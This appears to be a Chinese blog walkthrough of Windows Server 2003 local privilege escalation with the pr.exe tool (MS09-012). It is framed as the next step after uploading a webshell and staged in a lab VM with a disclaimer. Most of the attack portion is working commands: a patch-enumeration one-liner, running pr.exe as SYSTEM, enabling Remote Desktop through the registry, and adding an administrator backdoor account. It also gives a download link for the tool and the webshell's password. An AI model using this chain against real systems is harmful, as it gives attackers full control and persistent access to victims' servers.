【内网提权】windows2003本地PR提权详解

提权利用的漏洞

Microsoft Windows RPCSS服务隔离本地权限提升漏洞

RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程，本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统，攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

BUGTRAQ ID: 34443
CVE(CAN) ID: CVE-2009-0079

发布日期：2009-04-14
更新日期：2009-04-24

受影响系统：
Microsoft Windows XP x64 SP2
Microsoft Windows XP x64
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1

也就是说只有Windows Server 2003和windows xp系统能够使用 pr 提权。

PR提权

声明：以下的提权的介绍只适用于学习和授权情况下的操作，请勿用于非法环境！

以下环境：Windows Server 2003

很多时候，当我们上传了一句话木马之后，想要进行一些操作。比如，查看当前用户的身份，这时会发现权限不够，当前的命令行只对网站当前目录下的文件具有操作权限，对其他目录和系统都没有权限，这时我们就需要提权了。

我们把下面pr.exe程序上传到网站目录下去
工具下载：

链接：https://pan.baidu.com/s/1Z_2Up5i9ONs9nIfLtDeogQ
提取码：xw2g
登陆大马密码：xiaowang520

实验环境：

攻击(攻击者)机：	windows2010 物理机
目标(受害者)主机：	windows2003 虚拟机	NAT	192.168.254.130

【步骤一】上传（这里是直接复制进行的，构建环境）大马到目标网页主目录，并在物理机上进行登陆，结果如【图1】所示：

图1

【步骤二】用户权限查询，结果如【图2】所示：

【命令】

whoami  //用户权限查询

图2

【分析】当前系统为network用户，未取得系统system权限，需进行提权

【步骤三】查看系统版本及补丁情况，根据补丁情况进行提权，结果如【图3】所示：

【命令】

systeminfo  //查看系统版本及补丁情况

图3

【分析】没有进行补丁，可以利用漏洞进行提权

【步骤四】查询系统进行以下补丁与否，可以利用相应的没有朝廷实木2漏洞进行提权，结果如【图4】所示：

【命令】适用于window2003

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\temp.txt

图4

【分析】KB952004 Not Installed!未进行补丁，可以利用MS09-012漏洞其进行提权

【步骤五】上传pr.exe到可上传目录下 C:\RECYCLER\ 进行提权【可能会因为刚搭建的环境，没有用过回收站，导致直接在C盘找不到该目录，可以往回收站里面放入文件，就可以找到了】结果如【图5】所示：

图5

【步骤六】查看提权结果，结果如【图6】所示：

【命令】

C:\RECYCLER\pr.exe "whoami" //查看提权结果

图6

【分析】显示为system,说明提权成功

【步骤七】确认远程桌面是否开启对应的3389端口，结果如【图7】所示：

【命令】

/c C:\RECYCLER\pr.exe "netstat -ano" //确认远程桌面是否开启对应的端口

图7

【分析】没有开启3389端口，需要开启3389端口

【步骤八】：开启3389端口，复制下面代码，创建一个*.bat的文件，上传到C:\RECYCLER\ 目录下，结果如【图8】所示：

【命令】

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\RECYCLER\pr.exe  "C:\RECYCLER\1.bat"

图8

【分析】3389端口已打开，可以进行远程桌面连接

【步骤九】进行提权，创建一个加入管理员组的用户，结果如【图9】所示：

【命令】

C:\RECYCLER\pr.exe  "net user adm  123456 /add"

C:\RECYCLER\pr.exe  "net localgroup administrators adm /add"

【步骤九】连接远程桌面，结果如【图9】所示：

【命令】

mstsc

图7

【分析】远程桌面连接成功

【内网提权】windows2003本地PR提权详解相关推荐

git远程外网地址变内网怎么破(ssh本地端口转发)
git远程外网地址变内网怎么破(ssh本地端口转发)? 最近给longtubas上了负载均衡,相对来说我们并发并不高,但希望可用性尽可能高,本来打算用不饱和的机器做个lvs集群的, 但IDC说给个额外 ...
php 合并数组对象,JS内数组合并方法与对象合并实现步骤详解
这次给大家带来JS内数组合并方法与对象合并实现步骤详解,JS内数组合并方法与对象合并实现的注意事项有哪些,下面就是实战案例,一起来看一下. 1 数组合并 1.1 concat 方法var a=[1,2 ...
linux中etc下的hosts(本地IP解析)文件详解
linux中etc下的hosts(本地IP解析)文件详解 1./etc/hosts(本地解析) 很多人一提到更改hostname首先就想到修改/etc/hosts文件, 认为hostname的配置文件 ...
新手怎么开网店（网上开店注意事项及流程详解）
做亚马逊店铺其实也没有那么简单,毕竟是国际大平台,如果操作不当就会威胁你的店铺,所以我们要让我们变得更加专业才能不会被封店,或者违规行为,这个项目是赚钱,就看你会不会玩.现在我们来说一下亚马逊的怎么选 ...
爬虫实战（二）—利用requests、selenium爬取王者官网、王者营地APP数据及pymongo详解
概述可关注微信订阅号 loak 查看实际效果. 代码已托管github,地址为:https://github.com/luozhengszj/LOLGokSpider ,包括了项目的所有代码. 本文 ...
[Shopee虾皮网怎么注册开店]Shopee子母账号详解及注册教程
一.[Shopee虾皮网怎么注册开店]Shopee子母账号详解子母账户即Shopee平台的Sub-account(子账号) 系统,主要的作用是方便卖家对多个店铺进行统一管理,并对店铺的运营团队成员在 ...
玉米社：外链、反链、内链、友链的区别与联系详解
外链.反链.内链.友链的区别与联系详解 1.外链外链指从站外链向本站点某页面的链接,主要强调站外.我们常说的发外链,即在外部博客.论坛.自媒体等平台发布的带有自身网站链接的软文或者视频内容,但凡是从 ...
php搜索表格,table表格内对某列内容进行搜索筛选步骤详解
这次给大家带来table表格内对某列内容进行搜索筛选步骤详解,table表格内对某列内容进行搜索筛选的注意事项有哪些,下面就是实战案例,一起来看一下. 往往有些时候,我们把数据从数据库读取出来,显示到 ...
html5 php 数据库操作,HTML_HTML5本地数据库基础操作详解，下面分别介绍本地数据库的各 - phpStudy...
HTML5本地数据库基础操作详解下面分别介绍本地数据库的各个API及其使用方法. 1.利用openDatabase创建数据库我们可以利用openDatabase方法创建数据库.openDataba ...

【内网提权】windows2003本地PR提权详解

【内网提权】windows2003本地PR提权详解相关推荐

最新文章

热门文章